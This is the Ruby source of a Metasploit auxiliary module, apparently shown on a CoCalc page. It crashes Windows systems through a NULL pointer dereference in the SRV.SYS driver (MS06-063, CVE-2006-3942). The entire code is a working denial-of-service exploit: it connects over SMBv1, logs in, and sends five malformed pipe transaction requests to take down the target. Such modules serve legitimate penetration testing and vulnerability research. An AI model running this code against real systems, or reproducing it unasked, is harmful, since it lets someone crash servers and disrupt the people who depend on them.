CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Microsoft SRV.SYS Pipe Transaction No Null',
13
      'Description'    => %q{
14
        This module exploits a NULL pointer dereference flaw in the
15
      SRV.SYS driver of the Windows operating system. This bug was
16
      independently discovered by CORE Security and ISS.
17
      },
18

19
      'Author'         => [ 'hdm' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          ['OSVDB', '27644' ],
24
          ['MSB', 'MS06-063' ],
25
          ['CVE', '2006-3942'],
26
          ['BID', '19215'],
27
        ]
28
    ))
29

30
    deregister_options('SMB::ProtocolVersion')
31
  end
32

33
  def run
34

35
    print_status("Connecting to the target system...");
36

37
    connect(versions: [1])
38
    smb_login
39

40
    begin
41
      1.upto(5) do |i|
42
        print_status("Sending bad SMB transaction request #{i}...");
43
        self.simple.client.trans_nonull(
44
          "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
45
          '',
46
          Rex::Text.rand_text_alphanumeric(rand(16)+1),
47
          3,
48
          [1,0,1].pack('vvv'),
49
          true
50
        )
51
      end
52
    rescue ::Interrupt
53
      return
54

55
    rescue ::Exception => e
56
      print_error("Error: #{e.class} > #{e}")
57
    end
58

59

60
    disconnect
61
  end
62
end
63

64